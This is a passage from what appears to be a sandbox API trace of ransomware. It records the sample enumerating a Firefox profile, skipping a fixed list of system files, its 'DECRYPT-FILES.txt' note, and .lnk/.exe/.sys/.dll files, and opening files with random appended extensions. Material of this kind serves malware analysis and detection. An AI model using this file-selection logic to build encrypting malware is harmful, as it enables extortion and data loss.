HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite.3Naa7O" [0184.532] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.536] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite.3Naa7O" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\places.sqlite.3naa7o"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0184.536] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd6c0 | out: lpFileSize=0x36fd6c0*=10486024) returned 1 [0184.537] SetFilePointerEx (in: hFile=0x284, liDistanceToMove=0xfffffef8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0184.537] ReadFile (in: hFile=0x284, lpBuffer=0x36fd6cc, nNumberOfBytesToRead=0x108, lpNumberOfBytesRead=0x36fd6c8, lpOverlapped=0x0 | out: lpBuffer=0x36fd6cc*, lpNumberOfBytesRead=0x36fd6c8*=0x108, lpOverlapped=0x0) returned 1 [0184.538] SetFilePointerEx (in: hFile=0x284, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.538] CloseHandle (hObject=0x284) returned 1 [0184.538] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.538] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x81fbde30, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x81fbde30, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xad120560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xf1c, dwReserved0=0x0, dwReserved1=0x0, cFileName="pluginreg.dat.6iRNggg", cAlternateFileName="PLUGIN~1.6IR")) returned 1 [0184.538] lstrcmpiW (lpString1="pluginreg.dat.6iRNggg", lpString2="DECRYPT-FILES.txt") returned 1 [0184.538] lstrcmpiW (lpString1="pluginreg.dat.6iRNggg", lpString2="autorun.inf") returned 1 [0184.539] lstrcmpiW (lpString1="pluginreg.dat.6iRNggg", lpString2="boot.ini") returned 1 [0184.539] lstrcmpiW (lpString1="pluginreg.dat.6iRNggg", lpString2="desktop.ini") returned 1 [0184.539] lstrcmpiW (lpString1="pluginreg.dat.6iRNggg", lpString2="ntuser.dat") returned 1 [0184.539] lstrcmpiW (lpString1="pluginreg.dat.6iRNggg", lpString2="iconcache.db") returned 1 [0184.539] lstrcmpiW (lpString1="pluginreg.dat.6iRNggg", lpString2="bootsect.bak") returned 1 [0184.539] lstrcmpiW (lpString1="pluginreg.dat.6iRNggg", lpString2="ntuser.dat.log") returned 1 [0184.539] lstrcmpiW (lpString1="pluginreg.dat.6iRNggg", lpString2="thumbs.db") returned -1 [0184.539] lstrcmpiW (lpString1="pluginreg.dat.6iRNggg", lpString2="Bootfont.bin") returned 1 [0184.539] lstrlenW (lpString="pluginreg.dat.6iRNggg") returned 21 [0184.539] lstrcmpiW (lpString1="6iRNggg", lpString2="lnk") returned -1 [0184.539] lstrcmpiW (lpString1="6iRNggg", lpString2="exe") returned -1 [0184.539] lstrcmpiW (lpString1="6iRNggg", lpString2="sys") returned -1 [0184.539] lstrcmpiW (lpString1="6iRNggg", lpString2="dll") returned -1 [0184.539] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0184.539] lstrlenW (lpString="pluginreg.dat.6iRNggg") returned 21 [0184.539] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0184.539] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="pluginreg.dat.6iRNggg" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat.6iRNggg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat.6iRNggg" [0184.539] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.539] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat.6iRNggg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\pluginreg.dat.6irnggg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0184.540] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=3868) returned 1 [0184.540] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0184.540] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.540] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.541] CloseHandle (hObject=0x288) returned 1 [0184.541] CloseHandle (hObject=0x284) returned 1 [0184.541] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.541] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x84c85c10, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x853f60d0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xad1466c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x10e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="prefs.js.C9PJ", cAlternateFileName="PREFSJ~1.C9P")) returned 1 [0184.541] lstrcmpiW (lpString1="prefs.js.C9PJ", lpString2="DECRYPT-FILES.txt") returned 1 [0184.541] lstrcmpiW (lpString1="prefs.js.C9PJ", lpString2="autorun.inf") returned 1 [0184.541] lstrcmpiW (lpString1="prefs.js.C9PJ", lpString2="boot.ini") returned 1 [0184.541] lstrcmpiW (lpString1="prefs.js.C9PJ", lpString2="desktop.ini") returned 1 [0184.541] lstrcmpiW (lpString1="prefs.js.C9PJ", lpString2="ntuser.dat") returned 1 [0184.541] lstrcmpiW (lpString1="prefs.js.C9PJ", lpString2="iconcache.db") returned 1 [0184.541] lstrcmpiW (lpString1="prefs.js.C9PJ", lpString2="bootsect.bak") returned 1 [0184.541] lstrcmpiW (lpString1="prefs.js.C9PJ", lpString2="ntuser.dat.log") returned 1 [0184.541] lstrcmpiW (lpString1="prefs.js.C9PJ", lpString2="thumbs.db") returned -1 [0184.541] lstrcmpiW (lpString1="prefs.js.C9PJ", lpString2="Bootfont.bin") returned 1 [0184.541] lstrlenW (lpString="prefs.js.C9PJ") returned 13 [0184.541] lstrcmpiW (lpString1="C9PJ", lpString2="lnk") returned -1 [0184.542] lstrcmpiW (lpString1="C9PJ", lpString2="exe") returned -1 [0184.542] lstrcmpiW (lpString1="C9PJ", lpString2="sys") returned -1 [0184.542] lstrcmpiW (lpString1="C9PJ", lpString2="dll") returned -1 [0184.542] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0184.542] lstrlenW (lpString="prefs.js.C9PJ") returned 13 [0184.542] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0184.542] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="prefs.js.C9PJ" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js.C9PJ") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js.C9PJ" [0184.542] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.542] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js.C9PJ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\prefs.js.c9pj"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0184.542] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=4326) returned 1 [0184.542] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0184.542] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.543] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.543] CloseHandle (hObject=0x288) returned 1 [0184.543] CloseHandle (hObject=0x284) returned 1 [0184.543] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.544] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb6fa8c70, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb6fa8c70, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xad192980, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x428b, dwReserved0=0x0, dwReserved1=0x0, cFileName="search.json.G48s", cAlternateFileName="SEARCH~1.G48")) returned 1 [0184.544] lstrcmpiW (lpString1="search.json.G48s", lpString2="DECRYPT-FILES.txt") returned 1 [0184.544] lstrcmpiW (lpString1="search.json.G48s", lpString2="autorun.inf") returned 1 [0184.544] lstrcmpiW (lpString1="search.json.G48s", lpString2="boot.ini") returned 1 [0184.544] lstrcmpiW (lpString1="search.json.G48s", lpString2="desktop.ini") returned 1 [0184.544] lstrcmpiW (lpString1="search.json.G48s", lpString2="ntuser.dat") returned 1 [0184.544] lstrcmpiW (lpString1="search.json.G48s", lpString2="iconcache.db") returned 1 [0184.544] lstrcmpiW (lpString1="search.json.G48s", lpString2="bootsect.bak") returned 1 [0184.544] lstrcmpiW (lpString1="search.json.G48s", lpString2="ntuser.dat.log") returned 1 [0184.544] lstrcmpiW (lpString1="search.json.G48s", lpString2="thumbs.db") returned -1 [0184.544] lstrcmpiW (lpString1="search.json.G48s", lpString2="Bootfont.bin") returned 1 [0184.544] lstrlenW (lpString="search.json.G48s") returned 16 [0184.544] lstrcmpiW (lpString1="G48s", lpString2="lnk") returned -1 [0184.544] lstrcmpiW (lpString1="G48s", lpString2="exe") returned 1 [0184.544] lstrcmpiW (lpString1="G48s", lpString2="sys") returned -1 [0184.544] lstrcmpiW (lpString1="G48s", lpString2="dll") returned 1 [0184.544] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0184.544] lstrlenW (lpString="search.json.G48s") returned 16 [0184.544] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0184.544] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="search.json.G48s" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json.G48s") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json.G48s" [0184.544] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.544] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json.G48s" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\search.json.g48s"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0184.545] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=17035) returned 1 [0184.545] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0184.545] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.546] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.546] CloseHandle (hObject=0x288) returned 1 [0184.546] CloseHandle (hObject=0x284) returned 1 [0184.546] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.546] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb477d930, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb477d930, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xad1b8ae0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x4108, dwReserved0=0x0, dwReserved1=0x0, cFileName="secmod.db.TXerv", cAlternateFileName="SECMOD~1.TXE")) returned 1 [0184.546] lstrcmpiW (lpString1="secmod.db.TXerv", lpString2="DECRYPT-FILES.txt") returned 1 [0184.546] lstrcmpiW (lpString1="secmod.db.TXerv", lpString2="autorun.inf") returned 1 [0184.546] lstrcmpiW (lpString1="secmod.db.TXerv", lpString2="boot.ini") returned 1 [0184.546] lstrcmpiW (lpString1="secmod.db.TXerv", lpString2="desktop.ini") returned 1 [0184.546] lstrcmpiW (lpString1="secmod.db.TXerv", lpString2="ntuser.dat") returned 1 [0184.546] lstrcmpiW (lpString1="secmod.db.TXerv", lpString2="iconcache.db") returned 1 [0184.546] lstrcmpiW (lpString1="secmod.db.TXerv", lpString2="bootsect.bak") returned 1 [0184.546] lstrcmpiW (lpString1="secmod.db.TXerv", lpString2="ntuser.dat.log") returned 1 [0184.546] lstrcmpiW (lpString1="secmod.db.TXerv", lpString2="thumbs.db") returned -1 [0184.546] lstrcmpiW (lpString1="secmod.db.TXerv", lpString2="Bootfont.bin") returned 1 [0184.546] lstrlenW (lpString="secmod.db.TXerv") returned 15 [0184.546] lstrcmpiW (lpString1="TXerv", lpString2="lnk") returned 1 [0184.546] lstrcmpiW (lpString1="TXerv", lpString2="exe") returned 1 [0184.546] lstrcmpiW (lpString1="TXerv", lpString2="sys") returned 1 [0184.546] lstrcmpiW (lpString1="TXerv", lpString2="dll") returned 1 [0184.546] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0184.546] lstrlenW (lpString="secmod.db.TXerv") returned 15 [0184.546] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0184.546] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="secmod.db.TXerv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db.TXerv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db.TXerv" [0184.547] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.547] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db.TXerv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\secmod.db.txerv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0184.547] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=16648) returned 1 [0184.547] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0184.547] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.548] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.548] CloseHandle (hObject=0x288) returned 1 [0184.548] CloseHandle (hObject=0x284) returned 1 [0184.548] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.548] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb82fff30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xc3787480, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xad1dec40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x4de, dwReserved0=0x0, dwReserved1=0x0, cFileName="sessionstore.bak.KfZlHV", cAlternateFileName="SESSIO~1.KFZ")) returned 1 [0184.548] lstrcmpiW (lpString1="sessionstore.bak.KfZlHV", lpString2="DECRYPT-FILES.txt") returned 1 [0184.549] lstrcmpiW (lpString1="sessionstore.bak.KfZlHV", lpString2="autorun.inf") returned 1 [0184.549] lstrcmpiW (lpString1="sessionstore.bak.KfZlHV", lpString2="boot.ini") returned 1 [0184.549] lstrcmpiW (lpString1="sessionstore.bak.KfZlHV", lpString2="desktop.ini") returned 1 [0184.549] lstrcmpiW (lpString1="sessionstore.bak.KfZlHV", lpString2="ntuser.dat") returned 1 [0184.549] lstrcmpiW (lpString1="sessionstore.bak.KfZlHV", lpString2="iconcache.db") returned 1 [0184.549] lstrcmpiW (lpString1="sessionstore.bak.KfZlHV", lpString2="bootsect.bak") returned 1 [0184.549] lstrcmpiW (lpString1="sessionstore.bak.KfZlHV", lpString2="ntuser.dat.log") returned 1 [0184.549] lstrcmpiW (lpString1="sessionstore.bak.KfZlHV", lpString2="thumbs.db") returned -1 [0184.549] lstrcmpiW (lpString1="sessionstore.bak.KfZlHV", lpString2="Bootfont.bin") returned 1 [0184.549] lstrlenW (lpString="sessionstore.bak.KfZlHV") returned 23 [0184.549] lstrcmpiW (lpString1="KfZlHV", lpString2="lnk") returned -1 [0184.549] lstrcmpiW (lpString1="KfZlHV", lpString2="exe") returned 1 [0184.549] lstrcmpiW (lpString1="KfZlHV", lpString2="sys") returned -1 [0184.549] lstrcmpiW (lpString1="KfZlHV", lpString2="dll") returned 1 [0184.549] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0184.549] lstrlenW (lpString="sessionstore.bak.KfZlHV") returned 23 [0184.549] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0184.549] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="sessionstore.bak.KfZlHV" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak.KfZlHV") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak.KfZlHV" [0184.549] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.549] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak.KfZlHV" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.bak.kfzlhv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0184.550] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=1246) returned 1 [0184.550] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0184.550] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.550] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.550] CloseHandle (hObject=0x288) returned 1 [0184.550] CloseHandle (hObject=0x284) returned 1 [0184.551] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.551] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb82fff30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x84e029d0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xad22af00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xccd, dwReserved0=0x0, dwReserved1=0x0, cFileName="sessionstore.js.ZUeQ9Er", cAlternateFileName="SESSIO~1.ZUE")) returned 1 [0184.551] lstrcmpiW (lpString1="sessionstore.js.ZUeQ9Er", lpString2="DECRYPT-FILES.txt") returned 1 [0184.551] lstrcmpiW (lpString1="sessionstore.js.ZUeQ9Er", lpString2="autorun.inf") returned 1 [0184.551] lstrcmpiW (lpString1="sessionstore.js.ZUeQ9Er", lpString2="boot.ini") returned 1 [0184.551] lstrcmpiW (lpString1="sessionstore.js.ZUeQ9Er", lpString2="desktop.ini") returned 1 [0184.551] lstrcmpiW (lpString1="sessionstore.js.ZUeQ9Er", lpString2="ntuser.dat") returned 1 [0184.551] lstrcmpiW (lpString1="sessionstore.js.ZUeQ9Er", lpString2="iconcache.db") returned 1 [0184.551] lstrcmpiW (lpString1="sessionstore.js.ZUeQ9Er", lpString2="bootsect.bak") returned 1 [0184.551] lstrcmpiW (lpString1="sessionstore.js.ZUeQ9Er", lpString2="ntuser.dat.log") returned 1 [0184.551] lstrcmpiW (lpString1="sessionstore.js.ZUeQ9Er", lpString2="thumbs.db") returned -1 [0184.551] lstrcmpiW (lpString1="sessionstore.js.ZUeQ9Er", lpString2="Bootfont.bin") returned 1 [0184.551] lstrlenW (lpString="sessionstore.js.ZUeQ9Er") returned 23 [0184.551] lstrcmpiW (lpString1="ZUeQ9Er", lpString2="lnk") returned 1 [0184.551] lstrcmpiW (lpString1="ZUeQ9Er", lpString2="exe") returned 1 [0184.551] lstrcmpiW (lpString1="ZUeQ9Er", lpString2="sys") returned 1 [0184.551] lstrcmpiW (lpString1="ZUeQ9Er", lpString2="dll") returned 1 [0184.551] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0184.551] lstrlenW (lpString="sessionstore.js.ZUeQ9Er") returned 23 [0184.551] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0184.551] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="sessionstore.js.ZUeQ9Er" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js.ZUeQ9Er") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js.ZUeQ9Er" [0184.551] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.551] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js.ZUeQ9Er" (normalized: "c:\\users\\5p5nrgjn0js 